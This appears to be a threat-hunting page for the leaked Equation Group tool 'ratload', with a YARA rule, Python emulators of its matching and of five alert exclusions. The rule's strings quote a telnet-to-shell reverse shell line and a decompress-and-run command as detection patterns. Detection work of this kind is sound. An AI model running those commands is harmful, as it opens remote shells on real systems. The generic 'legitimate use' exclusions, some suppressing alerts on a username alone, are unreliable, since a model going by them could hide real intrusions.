This hunt hypothesis covers potential adversary use of the Equation Group hack tool ratload, which may indicate advanced persistent threat activity. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential compromise from sophisticated, previously unknown attack vectors.
YARA Rule
rule EquationGroup_ratload {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
    strings:
        $x1 = "/tmp/ratload.tmp.sh" fullword ascii
        $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
        $s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
    condition:
        filesize < 250KB and 1 of them
}
This YARA rule can be deployed in the following contexts:
This rule contains 3 string patterns ($x1, $x2, $s6) in its detection logic; any one of them found as a fullword ASCII string in a file smaller than 250KB produces a match.
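To show exactly what the rule's condition accepts and rejects, the following Python emulates the three `fullword ascii` strings and the `filesize < 250KB and 1 of them` condition without needing the yara-python library. This is an added example written for this page, not the signature author's code; the sample buffers are constructed test data, not real ratload files.

```python
import re

# Strings and modifiers copied from the EquationGroup_ratload rule above; all three are
# `fullword ascii`, so a hit must not be glued to alphanumeric bytes on either side.
RULE_STRINGS = {
    "$x1": b"/tmp/ratload.tmp.sh",
    "$x2": b'Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh"',
    "$s6": b"uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}",
}

# YARA's `250KB` means 250 * 1024 bytes; `filesize < 250KB` gates the whole rule.
MAX_SIZE = 250 * 1024


def fullword_matches(data, needle):
    """Offsets of `needle` in `data` under YARA fullword semantics: the byte before and the
    byte after the hit must not be alphanumeric ([A-Za-z0-9]); start and end of the data
    count as delimiters."""
    pattern = rb"(?<![A-Za-z0-9])" + re.escape(needle) + rb"(?![A-Za-z0-9])"
    return [m.start() for m in re.finditer(pattern, data)]


def evaluate_rule(data):
    """Emulate `condition: filesize < 250KB and 1 of them` and report which strings hit.

    String hits are reported even when the size gate fails, so an analyst can see why a
    large file that plainly contains the strings still does not match the rule."""
    hits = {name: fullword_matches(data, s) for name, s in RULE_STRINGS.items()}
    matched = [name for name, offsets in hits.items() if offsets]
    size_ok = len(data) < MAX_SIZE
    return {
        "filesize": len(data),
        "size_ok": size_ok,
        "strings": matched,
        "match": size_ok and len(matched) >= 1,
    }


def scan_file(path):
    """Run the emulated rule against a file on disk."""
    with open(path, "rb") as fh:
        return evaluate_rule(fh.read())


# Constructed samples (not real malware): a small shell script carrying $x1 ...
SAMPLE_HIT = b"#!/bin/sh\n# constructed sample for testing the rule\ncp \"$0\" /tmp/ratload.tmp.sh\nexit 0\n"
# ... the same string glued to alphanumerics, which fullword rejects ...
SAMPLE_GLUED = b"X/tmp/ratload.tmp.shX"
# ... and the hit padded past the 250KB gate, which the condition rejects.
SAMPLE_LARGE = SAMPLE_HIT + b"\x00" * MAX_SIZE

if __name__ == "__main__":
    for label, sample in (("hit", SAMPLE_HIT), ("glued", SAMPLE_GLUED), ("large", SAMPLE_LARGE)):
        print(label, evaluate_rule(sample))
```

The size gate is the practical caveat: a memory dump or an archive that embeds the ratload script will carry the same strings but exceed 250KB, so this rule is meant for scanning the dropped files themselves, not large containers.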
Scenario: Legitimate use of ratload as part of a scheduled job for malware analysis
Filter/Exclusion: process.parent_process_name:"Windows Task Scheduler" or process.command_line:"-analysis"
Scenario: System administrators using ratload to load a legitimate payload for security testing
Filter/Exclusion: process.user:"Administrator" and process.command_line:"--test-mode"
Scenario: Use of ratload by a legitimate security tool for threat emulation
Filter/Exclusion: process.file_name:"C:\Tools\SecurityEmulator\emulator.exe" or process.parent_process_name:"SecurityEmulator.exe"
Scenario: Scheduled system cleanup task using ratload to load a clean-up script
Filter/Exclusion: process.command_line:"clean-up-script.bat" and process.parent_process_name:"Task Scheduler"
Scenario: IT staff using ratload to deploy a legitimate configuration management tool
Filter/Exclusion: process.file_name:"C:\Tools\ConfigManager\configmgr.exe" or process.user:"IT-Admin"
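The five Filter/Exclusion expressions above share one small grammar: `field:"value"` terms joined by `and`/`or`. The Python below, added here as an illustration and not part of the original page or of any SIEM product, evaluates those exact expressions against constructed process events so the tuning logic can be unit-tested before it is deployed. It assumes phrase-style matching (the quoted value appears case-insensitively anywhere in the field); real query languages differ on exact versus substring semantics, so confirm the backend's behaviour before relying on it.

```python
import re

# The five exclusion expressions exactly as listed on the page (raw strings keep the backslashes).
EXCLUSIONS = {
    "scheduled malware analysis job":
        r'process.parent_process_name:"Windows Task Scheduler" or process.command_line:"-analysis"',
    "admin security testing":
        r'process.user:"Administrator" and process.command_line:"--test-mode"',
    "threat emulation tool":
        r'process.file_name:"C:\Tools\SecurityEmulator\emulator.exe" or process.parent_process_name:"SecurityEmulator.exe"',
    "scheduled clean-up task":
        r'process.command_line:"clean-up-script.bat" and process.parent_process_name:"Task Scheduler"',
    "configuration management deployment":
        r'process.file_name:"C:\Tools\ConfigManager\configmgr.exe" or process.user:"IT-Admin"',
}

# A token is either a field:"value" term or a bare and/or operator.
TOKEN_RE = re.compile(r'([A-Za-z0-9_.]+):"([^"]*)"|\b(and|or)\b')


def parse_filter(expr):
    """Tokenize an exclusion expression into (field, value) tuples and 'and'/'or' strings."""
    tokens = []
    for field, value, op in TOKEN_RE.findall(expr):
        tokens.append(op if op else (field, value))
    return tokens


def term_matches(field, value, event):
    """Assumption: phrase-style match, i.e. the quoted value occurs case-insensitively
    within the event field. Note this makes "Task Scheduler" also match
    "Windows Task Scheduler"; tighten to equality if the SIEM matches exactly."""
    return value.lower() in str(event.get(field, "")).lower()


def evaluate_filter(expr, event):
    """Evaluate with the usual precedence: `and` binds tighter than `or`."""
    groups = [[]]
    for tok in parse_filter(expr):
        if tok == "or":
            groups.append([])
        elif tok == "and":
            continue
        else:
            groups[-1].append(tok)
    return any(all(term_matches(f, v, event) for f, v in grp) for grp in groups if grp)


def triage(event):
    """Return the name of the first exclusion that suppresses the event, or None if the
    YARA hit should stay open for the analyst."""
    for name, expr in EXCLUSIONS.items():
        if evaluate_filter(expr, event):
            return name
    return None


# Constructed events (not real telemetry) using the field names from the page.
SAMPLE_EVENTS = {
    "config-deploy": {
        "process.user": "IT-Admin",
        "process.file_name": r"C:\Tools\ConfigManager\configmgr.exe",
        "process.command_line": "configmgr.exe --push",
        "process.parent_process_name": "explorer.exe",
    },
    # Administrator alone is not enough: the second scenario needs --test-mode too.
    "admin-without-test-flag": {
        "process.user": "Administrator",
        "process.file_name": r"C:\Users\Administrator\ratload",
        "process.command_line": "ratload",
        "process.parent_process_name": "cmd.exe",
    },
    "unexplained-execution": {
        "process.user": "backup",
        "process.file_name": "/tmp/ratload.tmp.sh",
        "process.command_line": "/bin/sh /tmp/ratload.tmp.sh",
        "process.parent_process_name": "cron",
    },
}

if __name__ == "__main__":
    for label, event in SAMPLE_EVENTS.items():
        print(label, "->", triage(event) or "ESCALATE")
```

Running it shows why `and` versus `or` matters for tuning: the `or` exclusions suppress on a single field (a user named IT-Admin alone is enough), while the `and` exclusions require both conditions, so an Administrator running ratload without `--test-mode` still reaches the analyst.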